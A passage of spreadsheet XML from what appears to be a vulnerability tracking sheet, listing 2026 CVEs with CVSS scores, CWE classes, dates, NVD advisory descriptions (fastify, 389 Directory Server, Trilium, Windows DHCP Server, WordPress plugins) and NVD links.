      <c r="E2794" s="5" t="inlineStr"/>
      <c r="F2794" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2794" s="5" t="inlineStr"/>
      <c r="H2794" s="5" t="inlineStr"/>
      <c r="I2794" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2794" s="5" t="inlineStr"/>
      <c r="K2794" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2794" s="5" t="inlineStr">
        <is>
          <t>fastify versions &gt;= 4.0.0 and before 5.12.2 can route a malformed URL sent under one plugin prefix to the custom not-found handler of a different sibling plugin, and invoke it without the preHandler hook declared for that handler. The internal not-found router for encapsulated handlers dispatches malformed paths through a single shared handler pointer before URL decoding, ignoring the prefix and skipping the selected handler's normal lifecycle. An unauthenticated attacker can therefore reach an authentication-protected private fallback through an unrelated public prefix and read its full response, bypassing the authentication hook and breaking prefix encapsulation. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M2794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76169</t>
        </is>
      </c>
    </row>
    <row r="2795">
      <c r="A2795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76560</t>
        </is>
      </c>
      <c r="C2795" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2795" s="5" t="inlineStr"/>
      <c r="F2795" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2795" s="5" t="inlineStr"/>
      <c r="H2795" s="5" t="inlineStr"/>
      <c r="I2795" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2795" s="5" t="inlineStr"/>
      <c r="K2795" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2795" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389 Directory Server. The SELFDN ACI bind-rule evaluator incorrectly matches an anonymous LDAP client's empty bind DN against an empty stored attribute value, allowing an unauthenticated client to satisfy access control checks intended to require a matching authenticated identity. This can allow an anonymous LDAP client to perform an operation, such as adding or modifying a directory entry, that a SELFDN-based ACI intended to restrict to a specific authenticated user.</t>
        </is>
      </c>
      <c r="M2795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76560</t>
        </is>
      </c>
    </row>
    <row r="2796">
      <c r="A2796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76905</t>
        </is>
      </c>
      <c r="C2796" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2796" s="5" t="inlineStr"/>
      <c r="F2796" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2796" s="5" t="inlineStr"/>
      <c r="H2796" s="5" t="inlineStr"/>
      <c r="I2796" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2796" s="5" t="inlineStr"/>
      <c r="K2796" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2796" s="5" t="inlineStr">
        <is>
          <t>kin-openapi is a Go project for handling OpenAPI files. From 0.10.0 until 0.141.0, openapi3filter.convertParseError in openapi3filter/validation_error_encoder.go dereferences e.Parameter.In without checking whether e.Parameter is nil. A malformed non-string scalar field in a multipart/form-data request body produces a nested ParseError with a nil RequestError.Parameter, and applications that render the validation error through openapi3filter.ConvertErrors or ValidationErrorEncoder panic. An unauthenticated client can repeatedly send such requests to deny service when the application lacks a recovery boundary. JSON request bodies and applications that do not use these error-rendering helpers are not affected. This issue is fixed in version 0.141.0.</t>
        </is>
      </c>
      <c r="M2796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76905</t>
        </is>
      </c>
    </row>
    <row r="2797">
      <c r="A2797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76956</t>
        </is>
      </c>
      <c r="C2797" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2797" s="5" t="inlineStr"/>
      <c r="F2797" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2797" s="5" t="inlineStr"/>
      <c r="H2797" s="5" t="inlineStr">
        <is>
          <t>libexpat_project:libexpat</t>
        </is>
      </c>
      <c r="I2797" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2797" s="5" t="inlineStr"/>
      <c r="K2797" s="5" t="inlineStr">
        <is>
          <t>CWE-394</t>
        </is>
      </c>
      <c r="L2797" s="5" t="inlineStr">
        <is>
          <t>In libexpat 2.8.2 and 2.8.3 before 2.8.4, misinterpretation of getentropy's return code leads to insufficient entropy, which results in being vulnerable to hash flooding attacks, causing a denial of service via crafted XML content.</t>
        </is>
      </c>
      <c r="M2797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76956</t>
        </is>
      </c>
    </row>
    <row r="2798">
      <c r="A2798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77108</t>
        </is>
      </c>
      <c r="C2798" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2798" s="5" t="inlineStr"/>
      <c r="F2798" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2798" s="5" t="inlineStr"/>
      <c r="H2798" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I2798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2798" s="5" t="inlineStr"/>
      <c r="K2798" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2798"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M2798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t>
        </is>
      </c>
    </row>
    <row r="2799">
      <c r="A2799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77124</t>
        </is>
      </c>
      <c r="C2799" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2799" s="5" t="inlineStr"/>
      <c r="F2799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2799" s="5" t="inlineStr"/>
      <c r="H2799" s="5" t="inlineStr"/>
      <c r="I2799" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2799" s="5" t="inlineStr"/>
      <c r="K2799" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L2799" s="5" t="inlineStr">
        <is>
          <t>In affected versions of Nexus Repository 3, the script execution endpoint (POST /service/rest/v1/script/{name}/run) did not verify whether script execution had been administratively disabled. An account holding script-execution permission could continue to run previously-created scripts even after an administrator set nexus.scripts.allowCreation=false, undermining the expectation that this setting fully blocks script execution.</t>
        </is>
      </c>
      <c r="M2799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77124</t>
        </is>
      </c>
    </row>
    <row r="2800">
      <c r="A2800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77384</t>
        </is>
      </c>
      <c r="C2800" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2800" s="5" t="inlineStr"/>
      <c r="F2800" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2800" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2800" s="5" t="inlineStr"/>
      <c r="I2800" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2800" s="5" t="inlineStr"/>
      <c r="K2800" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="L2800" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. Prior to version 4.2.9, the reservation refresh path in reservation-store.ts reuses the same retimeableSignal but unconditionally registers another abort listener on every refresh. As a result, a remote peer can repeatedly send valid RESERVE requests for the same reservation, causing unbounded listener and closure growth in @libp2p/circuit-relay-v2 relay servers and leading to denial of service. This issue is fixed in version 4.2.9.</t>
        </is>
      </c>
      <c r="M2800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77384</t>
        </is>
      </c>
    </row>
    <row r="2801">
      <c r="A2801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77438</t>
        </is>
      </c>
      <c r="C2801" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2801" s="5" t="inlineStr"/>
      <c r="F2801" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2801" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2801" s="5" t="inlineStr"/>
      <c r="I2801" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2801" s="5" t="inlineStr"/>
      <c r="K2801" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="L2801" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the public share-search endpoint does not enforce the per-note shareCredentials and shareHiddenFromTree controls, allowing an unauthenticated visitor to read the titles, tree paths, and content of protected shared notes. The endpoint authorizes only the ancestor note supplied in the request and then runs a full-text search across the entire published subtree, returning each matching note's title, share identifier, and hierarchical path without re-checking whether that individual note requires a share password or is hidden from the navigation tree. Because the search matches note content, an attacker can enumerate protected notes and use the endpoint as a boolean oracle that confirms arbitrary substrings, recovering the full contents of notes that should be gated behind a password. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M2801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77438</t>
        </is>
      </c>
    </row>
    <row r="2802">
      <c r="A2802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77465</t>
        </is>
      </c>
      <c r="C2802" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2802" s="5" t="inlineStr"/>
      <c r="F2802" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2802" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2802" s="5" t="inlineStr"/>
      <c r="I2802" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2802" s="5" t="inlineStr"/>
      <c r="K2802" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L2802" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="M2802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77465</t>
        </is>
      </c>
    </row>
    <row r="2803">
      <c r="A2803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="C2803" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2803" s="5" t="inlineStr"/>
      <c r="F2803" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2803" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2803" s="5" t="inlineStr"/>
      <c r="I2803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2803" s="5" t="inlineStr"/>
      <c r="K2803" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2803" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="2804">
      <c r="A2804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="C2804" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2804" s="5" t="inlineStr"/>
      <c r="F2804" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2804" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2804" s="5" t="inlineStr"/>
      <c r="I2804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2804" s="5" t="inlineStr"/>
      <c r="K2804" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2804" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="2805">
      <c r="A2805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="C2805" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2805" s="5" t="inlineStr"/>
      <c r="F2805" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2805" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2805" s="5" t="inlineStr"/>
      <c r="I2805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2805" s="5" t="inlineStr"/>
      <c r="K2805" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2805" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="2806">
      <c r="A2806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="C2806" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2806" s="5" t="inlineStr"/>
      <c r="F2806" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2806" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2806" s="5" t="inlineStr"/>
      <c r="I2806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2806" s="5" t="inlineStr"/>
      <c r="K2806" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2806" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="2807">
      <c r="A2807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="C2807" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2807" s="5" t="inlineStr"/>
      <c r="F2807" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2807" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2807" s="5" t="inlineStr"/>
      <c r="I2807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2807" s="5" t="inlineStr"/>
      <c r="K2807" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2807" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="2808">
      <c r="A2808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77771</t>
        </is>
      </c>
      <c r="C2808" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2808" s="5" t="inlineStr"/>
      <c r="F2808" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2808" s="5" t="inlineStr"/>
      <c r="H2808" s="5" t="inlineStr"/>
      <c r="I2808" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2808" s="5" t="inlineStr"/>
      <c r="K2808" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2808" s="5" t="inlineStr">
        <is>
          <t>The miniOrange 2FA  WordPress plugin before 6.3.1, miniOrange 2FA  WordPress plugin before 19.3 does not scope its second-factor attempt limit to the account being attacked, keying it instead to an identifier the client supplies and can change at will, allowing an attacker who already knows a victim's password to make unlimited one-time-passcode guesses and defeat the second factor. A second validation endpoint applies no attempt limit at all.</t>
        </is>
      </c>
      <c r="M2808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77771</t>
        </is>
      </c>
    </row>
    <row r="2809">
      <c r="A2809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77807</t>
        </is>
      </c>
      <c r="C2809" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2809" s="5" t="inlineStr"/>
      <c r="F2809" s="5" t="inlineStr"/>
      <c r="G2809" s="5" t="inlineStr"/>
      <c r="H2809" s="5" t="inlineStr"/>
      <c r="I2809" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2809" s="5" t="inlineStr"/>
      <c r="K2809" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2809" s="5" t="inlineStr">
        <is>
          <t>The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 11.0.4 via the `user[name]` Parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Exploitation requires "Embed images" option in AcyMailing configuration being enabled.</t>
        </is>
      </c>
      <c r="M2809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77807</t>
        </is>
      </c>
    </row>
    <row r="2810">
      <c r="A2810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="C2810" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2810" s="5" t="inlineStr"/>
      <c r="F2810" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2810" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2810" s="5" t="inlineStr"/>
      <c r="I2810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2810" s="5" t="inlineStr"/>
      <c r="K2810" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2810" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="2811">
      <c r="A2811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="C2811" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2811" s="5" t="inlineStr"/>
      <c r="F2811" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2811" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2811" s="5" t="inlineStr"/>
      <c r="I2811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2811" s="5" t="inlineStr"/>
      <c r="K2811" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2811" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="2812">
      <c r="A2812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="C2812" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2812" s="5" t="inlineStr"/>
      <c r="F2812" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2812" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2812" s="5" t="inlineStr"/>
      <c r="I2812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2812" s="5" t="inlineStr"/>
      <c r="K2812" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2812" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="2813">
      <c r="A2813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="C2813" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2813" s="5" t="inlineStr"/>
      <c r="F2813" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2813" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2813" s="5" t="inlineStr"/>
      <c r="I2813" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2813" s="5" t="inlineStr"/>
      <c r="K2813" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2813" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="2814">
      <c r="A2814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="C2814" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2814" s="5" t="inlineStr"/>
      <c r="F2814" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2814" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2814" s="5" t="inlineStr"/>
      <c r="I2814" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2814" s="5" t="inlineStr"/>
      <c r="K2814" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2814" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="2815">
      <c r="A2815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="C2815" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2815" s="5" t="inlineStr"/>
      <c r="F2815" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2815" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2815" s="5" t="inlineStr"/>
      <c r="I2815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2815" s="5" t="inlineStr"/>
      <c r="K2815" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2815" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="2816">
      <c r="A2816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77898</t>
        </is>
      </c>
      <c r="C2816" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2816" s="5" t="inlineStr"/>
      <c r="F2816" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2816" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2816" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2816" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2816" s="5" t="inlineStr"/>
      <c r="K2816" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
